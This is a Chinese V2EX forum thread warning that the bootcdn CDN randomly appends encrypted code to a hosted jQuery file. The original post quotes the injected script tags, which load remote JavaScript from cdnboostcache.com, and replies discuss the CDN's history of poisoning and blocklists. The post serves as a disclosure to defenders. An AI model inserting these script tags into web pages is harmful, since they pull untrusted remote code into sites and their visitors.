bootcdn 持续投毒,使用此 cdn 服务的各位要注意。

51 天前
 greatpp
今天巡查的时候发现网站被加入许多无意义的外链。

追查发现在访问 https://cdn.bootcdn.net/ajax/libs/jquery/1.10.2/jquery.min.js 的时候,

会随机在尾部拼接一段加密的 js 代码,需要多次访问复现,也可能做了其他展示条件。

这段加密会继续引用 https://www.cdnboostcache.com/sdk.html?s=b 页面。

主要内容为:

<script>document.writeln("<script src=\'https://www.cdnboostcache.com/sdk16.1.0.js?version="+zyt+"\'><\/script>");</script>
<script src="https://www.cdnboostcache.com/you.js?version=33"></script>

似乎是一些刷流量的功能,当然这种功能随便它来修改,也许晚上就是跳转色情广告。

当然提供免费 cdn 加速服务的是感谢的,但是如果是做这种违法的事情,那无非也就是利益驱使。

各位引用此 cdn 服务的需要多加注意。
1535 次点击
所在节点    分享发现
8 条回复
jko123
51 天前
这种 cdn 要是投毒,盈利空间太大了,无良公司才不在乎你个别人用不用
greatpp
51 天前
@chen2016 是的,最主要的,如果在不注意的时间跳转色情网站或者诈骗之类的被管局抓到,那实际网站运营者会有大麻烦,可不是说不知情就能过去的,就像一颗定时炸弹。
clarkethan
51 天前
国内公司搞的这种东西,还是得注意下
Mogugugugu
51 天前
直接 Google BootCDN 投毒,这个黑历史也太多了,还敢用的只能说心大活该。。。
lisongeee
51 天前
https://v2ex.com/t/1057993
94
51 天前
bootCDN 和 51la 居然还没有上大家的黑名单吗?
GuguDan
50 天前
这两天字节的 cdn 也 404 了,所以还有国内可用的免费 cdn 推荐吗
AhECbt
50 天前
![ublock]( https://ooo.0x0.ooo/2025/08/04/OfWGYi.png)

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1149621

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX